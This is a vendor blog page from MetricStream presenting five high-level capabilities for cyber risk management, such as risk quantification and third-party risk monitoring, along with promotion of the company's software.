Managing and mitigating third-party risks is a continuous and ongoing process. Supply chain, third-party, and vendor cyber risks will keep escalating as organizations continue to be driven by the many benefits that an extended enterprise brings. To stay ahead, organizations will need to amp up their protection to assess, manage, and mitigate risks. Click here to read what else the CISOs had to say about managing and monitoring third-party risk – and contact us to see how MetricStream can help! Request a custom demo now.
This is the second blog in the “CyberSeries: The Power of Resilience” blog series. As CISOs, CIOs, and board members all grapple with the challenge of cyber risk, we bring you what’s next when it comes to effectively measuring, managing, and mitigating risks in today’s complex and volatile environment. Read the first blog on Five Critical Capabilities to Prepare for Effective Cyber Risk Management.
Jump to Topic
Related Resources
Blogs
Five Critical Capabilities for Effective Cyber Risk Management
- IT Risk & Cyber Risk
- 19 January 22
4 min read
CyberSeries: The Power of Resilience
We’re excited to launch a new blog series, “CyberSeries: The Power of Resilience”. As CISOs, CIOs, and board members all grapple with the challenge of cyber risk, we will focus and connect on how to measure, manage, and mitigate risks in today’s complex and volatile environment.
In our first installment, we cover a key topic: critical capabilities required for preparing for the future to manage cyber risk effectively. Join us on the cyber resilience journey!
Power What’s Next: Five Critical Capabilities to Prepare for Effective Cyber Risk Management
It’s a whole new world for managing cyber risk – and the stakes are higher than ever. According to the Cost of Data Breach Report 2021 by IBM and the Ponemon Institute, the average cost of a data breach was $4.24 million in 2021, up from $3.86 million in 2019. Even more surprising, the average breach cost was $1.07 million higher where remote working was a factor.
As digitization has escalated, cyber adversaries have become increasingly sophisticated and organized to exploit vulnerabilities and carry out damaging attacks. What’s more, the challenges have gotten significantly worse over the past two years as the pandemic brought a tectonic shift in how businesses operate. The sudden shift to remote work beyond office firewalls and enterprise security mechanisms has expanded the attack surface of organizations and made them more vulnerable to breaches.
Industry 4.0 and Cybersecurity
To quickly adapt to the new normal, organizations rushed to adopt industry 4.0 technologies, such as cloud computing, artificial and automated bots. While these technologies help to automate various processes and make them more intuitive, cyber adversaries are also leveraging them to accomplish their own objectives such as AI-enabled phishing emails, botnet attacks, etc.
The digital-first approach will only amplify going forward and the traditional approach of managing cyber risks – identifying, assessing, monitoring, and responding to potential threats to IT infrastructure – is foundational, but no longer enough. Today, adopting a risk-based approach to cyber risk management is a business imperative. That means not just identifying and assessing cyber risks but also prioritizing cyber risks, ensuring continuous controls monitoring, and aligning cybersecurity strategy to the overarching enterprise risk management framework.
5 Critical Capabilities for the Future
So, what are the critical capabilities that organizations need to build cyber resilience and become future-ready? Here are some key considerations and recommendations.
- Automation
As cyber attacks become increasingly sophisticated, organizations must continuously augment their cyber risk management programs by adopting advanced technologies and automating wherever possible. CISOs and security teams must ensure that the deployed software is not only effective but also simplifies cyber threat identification and mitigation. For instance, manually sifting through past issues to find similar/relevant ones is highly time-consuming and prone to errors. Implementing an AI-based system can not only accelerate the process but also make it more intuitive by enabling security executives to search for past issues based on intent.
- Cyber Risk Quantification
In Gartner’s 2021 Board of Directors Survey, 88% of boards said that they see now cybersecurity as a business risk, not just a technology one. It’s at the top of board agendas – and directors are looking to CISOs and CIOs for updates and answers.
That means communicating cyber risk in business terms that make it easy to understand and prioritize risks. Cyber risk metrics, such as detected vulnerabilities and patch response times, intrusion attempts, security incident rates, severity levels, response time, etc., help in risk reporting, but they tend to focus on technical aspects.
Quantifying risk in monetary terms enables CISOs and security teams to better communicate cyber risks and the cybersecurity posture to leadership in business terms all can understand – dollars and cents. Assigning a dollar value to the risks also helps in making well-informed cybersecurity investment decisions.
How can your organization quantify cyber risks? Get the complete CISO’s Guide to Cyber Quantification
- Creating a Culture of Cybersecurity Awareness
Creating a culture of cybersecurity awareness must be a key part of the overall corporate culture and strategy. Particularly in this post-COVID era where various business functions and units are undergoing rapid digital transformation, organizations must clearly define security-related roles, responsibilities, and accountability as well as conduct training and workshops to enable cyber risk-aware behavior.
- Managing Third and Fourth-Party Risk
Recent incidents have highlighted how third-party cyber risks have largely been a blind spot for organizations. With the growing reliance on third parties and the amplified digital interconnectedness, the exposure of organizations to third-party cyber risks has increased exponentially. A security incident at one organization can quickly travel and paralyze several other connected organizations. A cyber risk program is incomplete without a proactive approach to monitoring cyber risks across your extended enterprise – third, fourth, and subsequent parties.
- Continuous Monitoring
Cyber risk management is a continuous, iterative business process. Organizations must continuously monitor related functions and processes – risk assessments, reporting mechanisms, remediation and mitigation measures, exception management, controls, etc. – to proactively identify gaps or loopholes that might exist and ensure the efficacy of the cyber defense mechanisms.
MetricStream Can Help
MetricStream enables organizations to adopt a focused and business-driven approach to managing IT and cyber risks with its IT & Cyber Risk Management software. The product simplifies conducting IT risk assessments, implementing controls, and streamlining mitigation actions.
In addition, AI-based intelligent issue management, advanced cyber risk quantification capabilities, along advanced analytics and reports help strengthen cyber resilience with actionable insights. To request a personalized demo, click here.
We look forward to continuing the conversation. How are you powering cyber resilience in your organization? Please comment below!
Jump to Topic
